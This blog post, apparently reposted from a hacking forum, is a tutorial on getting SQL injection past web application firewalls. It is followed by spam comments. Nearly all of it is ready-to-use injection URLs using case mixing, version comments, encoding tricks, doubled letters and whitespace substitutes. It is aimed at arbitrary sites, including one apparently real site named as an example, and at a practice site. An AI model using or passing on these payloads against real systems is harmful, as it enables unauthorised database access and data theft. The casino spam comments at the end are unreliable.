Newest Post
Now ill show different waf's we face while we inject sites in some examples ::
example (1)
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt -- - [no waf]
so here the word blocked by firewall is word "uNiOn" so ur query should be like
http://www.site.com/php?id=2 /*!50000uNiOn*/ select 1,2,3,4,5-- -
note:: some times using combination of uppercase and lowercase will bypass waf
" so always use a combination of uppercase and lowercase"
like >> uNiOn SeLeCt.***
example (2)
http://www.site.com/php?id=2 uNiOn-- - [no waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt [waf]
so here firewall is blocking the combine use of union and select so the
waf bypass should be applied in between union and select words
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- -
(or)
http://www.site.com/php?id=2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -
%23 => url encoded form of #
and
%0A => line feed
%23 will terminate the query so using a linefeed (%0A) will make our query work
some times even after using
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- - [waf]
it blocks the query so better use
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt 1,2,3,4,5-- -
example (3)
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt-- - [waf]
now lets try to bypass this
http://www.site.com/php?id=2 /*!50000uNiOn*/ SeLeCt-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt-- - [waf]
now lets try using url encoding
http://www.site.com/php?id=2 %75nIOn SeLeCt -- -[waf]
http://www.site.com/php?id=2 %75nIOn %73eLeCt-- - [no waf]
here %75 => u and %73 => s {url encoded form}
example (4)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2,3,4,5-- - [waf]
lets go step by step
http://www.site.com/php?id=2 /*!50000union*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2-- - [waf]
if u observe waf apppread after using a comma (,) .Lets try to bypass this
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2-- - (no waf)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2,~~3,~~4,~~5-- - [bypassed]
(or)
http://www.site.com/php?id=2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]
example (5)
i see some injectors using uNunionIOn without knowing the purpose of using it.***
when u have to use uNunionIOn ?
lets see
if u observe when ever our query is incomplete site will show an error on page
example
http://www.cobranet.org/about.php?id=1 union-- -
result >>
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '' at line
1
ur getting this error because ur query is incomplete but in some sites when u use
http://www.site.com/php?id=2 union-- -
result >> page doesnot show any error and the page load normally it mean the
word union is being removed or escaped from our query in such case we can use
uNuNionNion
and in some sites specific letters will be escaped ******
lets see this on a live site
http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOn-- -
result >>
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near 'uni-- -'' at line 1
from the above error u can see some letters in the word union are being escaped
so the letters being escpaed have to be used twice to bypass this
http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOnon-- - [bypassed]
result >> You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '' at line 1
http://zixem.altervista.org/SQLi/level3.php?item=-3' uNiOnon select 1,2,3,4-- -
and we got the vulnerable coloumns.***
example (6)
some times we can see union or select word doesnot get bypassed even
after we tried all the alternatives to bypass then using of some special
characters may bypass the waf.***
uni<>on sel<>ect
uni*on sel*ect
(uni)(on) (sel)(ect)
uni[]on sel[]ect
uni\on sel\ect etc.************
example (7)
in some sites we face white space block means when ever we use a space there
will be a waf there we can use odd number of apostrophes /* in between spaces
or we can use
%0b
%0d
%C0 etc
>> www.site.com/php?id=2/*****/uNiOn/*****/select/*****/1,2,3,4,5-- -
www.site.com/php?id=2%0bunion%0bselect%0b1,2,3,4,5-- - etc
tutorial is getting bigger so ill continue this tutorial in the second part of the waf bypassing
hope u understood
[credits to masters yogesh bhagat sir,geek kid, aakash choudhary i learned waf bypassing from these people]
plzz give ur feedback about my tutorial thank u ******
cyaaa.***
source http://forum.sqliwiki.com/showthread.php?tid=4001
The official video of the film “The Dog House” | videodl.cc
BalasHapusVideo of youtube mp4 “The Dog House” on Vimeo, the world's largest free website. (Sega, 1993) The film “The Dog House” has not
JAMASVILLE, Conn. - Casino & Resort
BalasHapusJAMASVILLE, Conn. 청주 출장안마 - The JAMASVILLE, Conn. Casino 인천광역 출장마사지 & Resort is in the 밀양 출장마사지 entertainment, 수원 출장샵 dining, 창원 출장마사지 shopping, shopping, entertainment and much more.